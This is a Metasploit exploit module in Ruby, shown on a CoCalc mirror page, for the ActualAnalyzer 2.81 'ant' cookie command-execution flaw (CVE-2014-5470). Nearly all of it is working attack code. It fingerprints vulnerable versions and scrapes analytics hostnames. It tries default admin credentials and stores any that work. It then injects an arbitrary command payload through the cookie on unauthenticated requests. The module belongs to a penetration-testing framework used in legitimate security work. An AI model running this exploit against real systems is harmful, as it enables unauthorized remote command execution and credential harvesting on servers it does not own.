CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(12info,13'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",14'Description' => %q{15This module exploits a command execution vulnerability in16ActualAnalyzer version 2.81 and prior.1718The 'aa.php' file allows unauthenticated users to19execute arbitrary commands in the 'ant' cookie.20},21'License' => MSF_LICENSE,22'Author' =>23[24'Benjamin Harris', # Discovery and exploit25'bcoles' # Metasploit26],27'References' =>28[29['CVE', '2014-5470'],30['EDB', '34450'],31['OSVDB', '110601']32],33'Payload' =>34{35'Space' => 4096, # HTTP cookie36'DisableNops' => true,37'BadChars' => "\x00"38},39'Arch' => ARCH_CMD,40'Platform' => 'unix',41'Targets' =>42[43# Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu44['ActualAnalyzer <= 2.81', { 'auto' => true }]45],46'Privileged' => false,47'DisclosureDate' => '2014-08-28',48'DefaultTarget' => 0))4950register_options(51[52OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),53OptString.new('USERNAME', [true, 'The username for ActualAnalyzer', 'admin']),54OptString.new('PASSWORD', [true, 'The password for ActualAnalyzer', 'admin']),55OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])56])57end5859#60# Checks if target is running ActualAnalyzer <= 2.8161#62def check63# check for aa.php64res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))65if !res66vprint_error("Connection failed")67return Exploit::CheckCode::Unknown68elsif res.code == 40469vprint_error("Could not find aa.php")70return Exploit::CheckCode::Safe71elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/72vprint_error("ActualAnalyzer is not installed. Try installing first.")73return Exploit::CheckCode::Detected74end75# check version76res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))77if !res78vprint_error("Connection failed")79return Exploit::CheckCode::Unknown80elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body81vprint_status("Found version: #{version}")82if Rex::Version.new(version) <= Rex::Version.new('2.81')83report_vuln(84host: rhost,85name: self.name,86info: "Module #{fullname} detected ActualAnalyzer #{version}",87refs: references,88)89return Exploit::CheckCode::Vulnerable90end91return Exploit::CheckCode::Detected92elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/93return Exploit::CheckCode::Detected94end95Exploit::CheckCode::Safe96end9798#99# Try to retrieve a valid analytics host from view.php unauthenticated100#101def get_analytics_host_view102analytics_host = nil103res = send_request_cgi(104'method' => 'POST',105'uri' => normalize_uri(target_uri.path, 'view.php'),106'vars_post' => {107'id_h' => '',108'listp' => '',109'act_h' => 'vis_int',110'oldact' => 'vis_grpg',111'tint_h' => '',112'extact_h' => '',113'home_pos' => '',114'act' => 'vis_grpg',115'tint' => 'total',116'grpg' => '201',117'cp_vst' => 'on',118'cp_hst' => 'on',119'cp_htst' => 'on',120'cp_reps' => 'y',121'tab_sort' => '1_1'122}123)124if !res125vprint_error("Connection failed")126elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body127vprint_good("Found analytics host: #{analytics_host}")128return analytics_host129else130vprint_status("Could not find any hosts on view.php")131end132nil133end134135#136# Try to retrieve a valid analytics host from code.php unauthenticated137#138def get_analytics_host_code139analytics_host = nil140res = send_request_cgi(141'uri' => normalize_uri(target_uri.path, 'code.php'),142'vars_get' => {143'pid' => '1'144}145)146if !res147vprint_error("Connection failed")148elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body149vprint_good("Found analytics host: #{analytics_host}")150return analytics_host151else152vprint_status("Could not find any hosts on code.php")153end154nil155end156157#158# Try to retrieve a valid analytics host from admin.php with creds159#160def get_analytics_host_admin161analytics_host = nil162user = datastore['USERNAME']163pass = datastore['PASSWORD']164res = send_request_cgi(165'method' => 'POST',166'uri' => normalize_uri(target_uri.path, 'admin.php'),167'vars_post' => {168'uname' => user,169'passw' => pass,170'id_h' => '',171'listp' => '',172'act_h' => '',173'oldact' => 'pages',174'tint_h' => '',175'extact_h' => '',176'param_h' => '',177'param2_h' => '',178'home_pos' => '',179'act' => 'dynhtml',180'set.x' => '11',181'set.y' => '11'182}183)184if !res185vprint_error("Connection failed")186elsif res.code == 200 && res.body =~ />Login</187vprint_error("Login failed")188elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body189vprint_good("Found analytics host: #{analytics_host}")190print_good("Login Successful (#{user}:#{pass})")191store_valid_credential(user: user, private: pass)192return analytics_host193else194vprint_error("Could not find any hosts on admin.php")195end196nil197end198199def execute_command(cmd, opts = { analytics_host: vhost })200vuln_cookies = %w(anw anm)201res = send_request_cgi(202'uri' => normalize_uri(target_uri.path, 'aa.php'),203'vars_get' => { 'anp' => opts[:analytics_host] },204'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"205)206if !res207fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")208elsif res.code == 302 && res.headers['Content-Type'] =~ /image/209print_good("Payload sent successfully")210return true211elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/212vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")213elsif res.code == 200 && res.body =~ /Admin area<\/title>/214fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")215else216fail_with(Failure::Unknown, "#{peer} - Something went wrong")217end218nil219end220221def exploit222return unless check == Exploit::CheckCode::Vulnerable223analytics_hosts = []224if datastore['ANALYZER_HOST'].blank?225analytics_hosts << get_analytics_host_code226analytics_hosts << get_analytics_host_view227analytics_hosts << get_analytics_host_admin228analytics_hosts << vhost229analytics_hosts << '127.0.0.1'230analytics_hosts << 'localhost'231else232analytics_hosts << datastore['ANALYZER_HOST']233end234analytics_hosts.uniq.each do |host|235next if host.nil?236vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")237break if execute_command(payload.encoded, analytics_host: host)238end239end240end241242243